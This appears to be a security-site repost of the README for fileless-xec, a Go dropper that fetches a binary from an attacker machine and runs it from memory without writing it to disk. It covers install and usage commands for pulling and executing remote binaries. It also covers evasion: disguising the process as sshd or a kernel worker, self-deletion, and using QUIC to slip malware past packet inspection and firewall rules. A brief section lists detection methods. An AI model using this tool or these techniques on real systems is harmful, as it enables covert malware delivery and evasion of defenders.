Fileless-Xec is a Stealth Dropper Executing Remote Binaries Without Dropping Them On Disk
Pentest use: fileless-xec
is used on target machine to stealthy execute a binary file located on attacker machine
Short story
fileless-xec
enable us to execute a remote binary on a local machine directly from memory without dropping them on disk
Install
From release
Linux:
curl -lO -L https://github.com/ariary/fileless-xec/releases/latest/download/fileless-xec
Windows:
curl -lO -L https://github.com/ariary/fileless-xec/releases/latest/download/fileless-xec_windows.exe
From source
Clone the repo and download the dependencies locally:
git clone https://github.com/ariary/fileless-xec.git
cd fileless-xec
make before.build
To build the fileless-xec for linux
build.fileless-xec
To build the fileless-xec for windows
windows.build.fileless-xec
With go
command
Make sure $GOPATH
is in your $PATH
before
Install fileless-xec
go install github.com/ariary/fileless-xec/cmd/fileless-xec
Explanation
We want to execute writeNsleep
binary locate on a remote machine, locally.
We first start a python http server on remote. Locally we use fileless-xec
and impersonate the /usr/sbin/sshd
name for the execution of the binary writeNsleep
(for steal thiness & fun). Once write N sleep started fileless-xec will delete itself (--self-remove
)
Other use cases
fileless-xec
self removefileless-xec
server modefileless-xec
on windowsSteal thiness story
fileless-xec
self removes once launchedThe remote binary file is stored locally using memfd_create
syscall, which store it within a memory disk which is not mapped into the file system (ie you can’t find it using ls
).
Then we execute it using fexecve
syscall (as it is currently not provided by syscall
golang library we implem it).
With fexecve
we could exec a program, but we reference the program to run using a file descriptor, instead of the full path.
Enable it with -Q /http3 flag.You can setup a light web rootfs server supporting http3 by running go run ./test/http3/light-server.go -p LISTENING PORT (This is http3 equivalent of python3 -m http.server )use test/http3/genkey.sh to generate cert and key. |
QUIC
UDP aka http3
is a new generation Internet protocol that speeds online web applications that are susceptible to delay, such as searching, video streaming etc., by reducing the round-trip time (RTT) needed to connect to a server.
Because QUIC uses proprietary encryption equivalent to TLS (this will change in the future with a standardized version), 3rd generation firewalls that provide application control and visibility encounter difficulties to control and monitor QUIC traffic.
If you actually use fileless-xec
as a dropper (Only for testing purpose or with the authorization), you likely want to execute some type of malwares or other file that could be drop by packet analysis. Hence, with Quic enables you could bypass packet analysis and GET a malware.
Also, in case firewall is only used for allowing/blocking traffic it could happen that firewall rules forget the udp protocol making your requests go under the radars
Although not present on the memory disk, the running program can still be detected using ps
command for example.
fileless-xec --name <fake_name> <binary_raw_url>
by default the name is [kworker/u:0]
setsid fileless-xec <binary_raw_url>
. WIP call setsid
from code
You could still be detected with:
$ lsof | grep memfd
Or also opensnoop
(but not by execsnoop
)
Or seccomp profile auditing execve
syscall (but it is very overwhelming as a sleep
command also use execve)
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…